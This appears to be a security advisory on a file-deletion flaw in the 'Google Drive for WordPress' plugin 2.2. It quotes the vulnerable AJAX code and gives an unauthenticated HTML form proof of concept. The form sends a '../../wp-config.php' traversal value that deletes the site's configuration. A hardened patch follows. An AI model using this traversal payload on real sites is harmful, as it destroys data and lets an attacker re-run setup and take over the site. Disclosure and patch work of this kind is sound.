Details
- Name : Google Drive for WordPress
- Version : 2.2
- Homepage : https://wordpress.org/plugins/wp-google-drive/
Description
- Access required: none (the AJAX endpoint can be called without logging in).
- $_POST['file_name'] is used without sanitization or path validation, so directory-traversal sequences reach unlink().
Code
File: wp-content/plugins/wp-google-drive/gdrive-ajaxs.php
Line: 15 - 22
switch ( $_POST['ajaxstype'] ) {
    ...
    case 'del_fl_bkp':
        gd_delete_listById( $_POST['id'] );
        // file_name is taken verbatim from the request: no nonce, capability or path check
        $dir = GBACKUP_PLUGIN_BACKUPFOLDER_PATH . "/" . $_POST['file_name'];
        // "../" sequences escape the backup folder, so any file the web server can write is deletable
        unlink( $dir );
Proof of Concept
1 - Submit the following form (no authentication is required):
<form method="post"
      action="http://target/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php">
    <input type="text" name="ajaxstype" value="del_fl_bkp">
    <input type="text" name="file_name" value="../../wp-config.php">
    <input type="text" name="id" value="1">
    <input type="submit">
</form>
Results
wp-config.php is deleted; without it WordPress presents the installer again, which makes it possible to re-run the whole setup.
Note
Solution
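As an added illustration (not the advisory author's patch or the vendor's fix), the following is a hardened version of the 'del_fl_bkp' handler. It assumes the plugin's existing GBACKUP_PLUGIN_BACKUPFOLDER_PATH constant and gd_delete_listById() helper; the nonce action name, the required capability and the backup file-name pattern are assumptions.

```php
<?php
// Added example: hardened handler for the 'del_fl_bkp' action.
// Assumed: GBACKUP_PLUGIN_BACKUPFOLDER_PATH and gd_delete_listById() come from the plugin;
// the nonce action 'gdrive_delete_backup', the 'manage_options' capability and the
// '.zip' file-name pattern are assumptions for this example, not the plugin's own values.

// 1. Authentication and authorization: only administrators may delete backups.
if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
    wp_send_json_error( 'Insufficient privileges', 403 );
}

// 2. CSRF protection: the request must carry a valid nonce (dies on failure).
check_ajax_referer( 'gdrive_delete_backup', 'nonce' );

// 3. Strip any directory component, so "../../wp-config.php" becomes "wp-config.php".
$file_name = isset( $_POST['file_name'] ) ? wp_unslash( $_POST['file_name'] ) : '';
$file_name = basename( $file_name );

// 4. Allowlist the shape of a backup file name (assumed pattern: archive names only).
if ( $file_name === '' || ! preg_match( '/^[A-Za-z0-9._-]+\.zip$/', $file_name ) ) {
    wp_send_json_error( 'Invalid file name', 400 );
}

// 5. Resolve both paths and confirm the target really lives inside the backup folder.
//    realpath() follows symlinks and returns false for non-existent files.
$backup_dir = realpath( GBACKUP_PLUGIN_BACKUPFOLDER_PATH );
$target     = realpath( $backup_dir . DIRECTORY_SEPARATOR . $file_name );

if ( $backup_dir === false || $target === false
     || strpos( $target, $backup_dir . DIRECTORY_SEPARATOR ) !== 0 ) {
    wp_send_json_error( 'File is not inside the backup folder', 400 );
}

// 6. Only now touch the database record and the file system.
gd_delete_listById( absint( $_POST['id'] ) );
if ( ! unlink( $target ) ) {
    wp_send_json_error( 'Delete failed', 500 );
}
wp_send_json_success( 'Backup removed' );
```

The check in step 5 is the one that directly closes the traversal shown above: even a name that survives basename() is rejected unless it resolves to a path under the backup directory.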
Timeline
- Discovery date : 11/25/2017
- Vendor contact date : 12/26/2017
- Publication date :
- Resolution date :